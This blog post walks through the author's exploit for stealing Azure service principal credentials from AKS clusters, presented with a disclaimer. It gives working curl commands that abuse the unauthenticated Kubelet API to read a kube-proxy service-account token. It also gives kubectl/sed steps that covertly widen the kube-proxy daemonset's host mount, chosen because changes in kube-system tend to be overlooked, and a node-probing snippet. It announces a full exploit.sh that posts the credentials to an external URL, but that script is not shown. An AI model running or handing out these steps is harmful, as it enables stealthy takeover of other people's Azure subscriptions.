DISCLAIMER: the contents below are for general information purposes only. The exploit is shared only to emphasise the need to secure your AKS clusters and not to run untrusted Docker images. Use of the information contained here is therefore strictly at your own risk.

I will walk through an exploit I created that allows a simple container to find the Azure service principal details of an AKS cluster and send them to a remote URL.

Most of the techniques used here are based on the taking over AKS clusters post I wrote a while ago. A fundamental piece to achieve this is the Kubelet API trick, which allows you to poke around any running pod within a node, giving you extra powers even if your pod runs as a non-root/least-privileged user.

To understand a bit better how we will get access to the Azure subscription, you need to know that AKS is based on the ACS engine, an open-source project that eases the provisioning of clusters on Azure. It internally uses a file to store the service principal (SPN) credentials so it can interact with the Azure API. That file exists on every single cluster node and is located at the path below:

/etc/kubernetes/azure.json
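For reference, azure.json holds the service principal credentials in clear text. The sketch below shows its rough shape; all values are placeholders, and the exact set of fields varies by AKS/ACS-engine version:

```json
{
  "cloud": "AzurePublicCloud",
  "tenantId": "00000000-0000-0000-0000-000000000000",
  "subscriptionId": "00000000-0000-0000-0000-000000000000",
  "aadClientId": "00000000-0000-0000-0000-000000000000",
  "aadClientSecret": "<service-principal-secret>",
  "resourceGroup": "MC_myResourceGroup_myCluster_westeurope",
  "location": "westeurope"
}
```

The aadClientId/aadClientSecret pair is what lets an attacker authenticate against the Azure API as the cluster's service principal.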

There are a few different ways to get the contents of this file, but in essence, we will need to mount the host (node) volume onto a privileged container.

The sneakiest way I found to do this is to manipulate the kube-proxy daemonset, which already runs as privileged and has a mount to /etc/kubernetes/certs. As people tend not to pay much attention to what goes on within the kube-system namespace, the change we will make can easily be overlooked.
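Concretely, the change boils down to widening the hostPath of the existing certs volume to its parent directory. A sketch of the relevant daemonset fragment (the volume name is illustrative; check the actual spec on your cluster):

```yaml
# Before: only the certs directory is exposed to the container
volumes:
- name: certs
  hostPath:
    path: /etc/kubernetes/certs

# After: the parent folder is exposed, so azure.json is reachable too
volumes:
- name: certs
  hostPath:
    path: /etc/kubernetes
```

Since the exploit's sed rewrites every kubernetes/certs occurrence, the container's mountPath moves in lockstep with the hostPath, so the certs remain reachable at the same in-container path and kube-proxy keeps working.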

Getting an API Server Token

Depending on how your pod is scheduled, you may or may not get an API server token mounted into it. To make this more generic, we will get the token from a kube-proxy container:

POD=$(curl -sk https://10.240.0.4:10250/runningpods/ \
  | jq -r '.items[].metadata.name' \
  | grep kube-proxy)

curl --connect-timeout 5 -sk \
  "https://10.240.0.4:10250/run/kube-system/${POD}/kube-proxy/" \
  -d "cmd=cat /run/secrets/kubernetes.io/serviceaccount/token" \
  -o token.txt
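The pod-name extraction step can be checked locally against a canned /runningpods/ response; the JSON below is a made-up sample of what the Kubelet returns:

```shell
# Made-up sample of the Kubelet /runningpods/ response
RESPONSE='{"items":[{"metadata":{"name":"kube-proxy-abc12"}},{"metadata":{"name":"coredns-xyz98"}}]}'

# jq -r prints raw strings (no surrounding quotes), then grep picks the kube-proxy pod
POD=$(echo "$RESPONSE" | jq -r '.items[].metadata.name' | grep kube-proxy)
echo "$POD"   # → kube-proxy-abc12
```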

Notice that we are leveraging unauthenticated access to the Kubelet API on IP 10.240.0.4. That is generally the first node within an AKS cluster. However, a cleverer exploit could find this dynamically.
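As a sketch of what finding the node dynamically could look like: AKS agent nodes typically sit in the 10.240.0.0/16 subnet starting at .4, so a naive approach is to enumerate candidate IPs and probe each Kubelet port. The subnet, the range, and the probe below are assumptions to adapt to the target cluster:

```shell
# Enumerate candidate node IPs (AKS default subnet, first node at .4)
candidate_ips() {
  for last in $(seq 4 20); do
    echo "10.240.0.${last}"
  done
}

# Probe one candidate: an unauthenticated Kubelet answers on port 10250.
# Not invoked here; run it against each candidate on a cluster you own.
probe() {
  curl --connect-timeout 2 -sk "https://${1}:10250/runningpods/" >/dev/null && echo "$1"
}

candidate_ips
```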

Tampering with kube-proxy

The kube-proxy daemonset requires access to the path /etc/kubernetes/certs. We will amend it so that we actually mount the parent folder. That simple change keeps the system working, as the certs mapping will still be available; however, it also gives us access to the full contents of the azure.json file.

In theory, that could be done by exporting its yaml, replacing kubernetes/certs with kubernetes, then applying the change:

kubectl get ds/kube-proxy --namespace kube-system -o yaml --export | sed -E 's/kubernetes\/certs/kubernetes/g' | kubectl apply --namespace kube-system -f -

By default, changes to daemonsets are only rolled out on delete. So in the actual exploit we do it in three steps: 1. export the yaml, 2. remove the existing kube-proxy, 3. apply the changes.
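The three steps can be sketched as a script. This version is a dry run that only prints the commands it would execute (unset DRY_RUN to actually run them against a cluster you own; the patched-yaml filename is hypothetical, and note that --export was removed in recent kubectl versions):

```shell
# Dry-run helper: print each command; only execute it when DRY_RUN is unset
run() {
  echo "+ $*"
  [ -n "${DRY_RUN}" ] || "$@"
}
DRY_RUN=1

# 1. export the current daemonset
#    (the real exploit pipes this through: sed -E 's/kubernetes\/certs/kubernetes/g')
run kubectl get ds/kube-proxy --namespace kube-system -o yaml --export

# 2. remove the existing kube-proxy so the change is rolled out
run kubectl delete ds/kube-proxy --namespace kube-system

# 3. apply the amended daemonset
run kubectl apply --namespace kube-system -f kube-proxy-patched.yaml
```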

Here’s the full exploit.sh:

When executed, it will print the Azure SPN details and also post them to an external URL.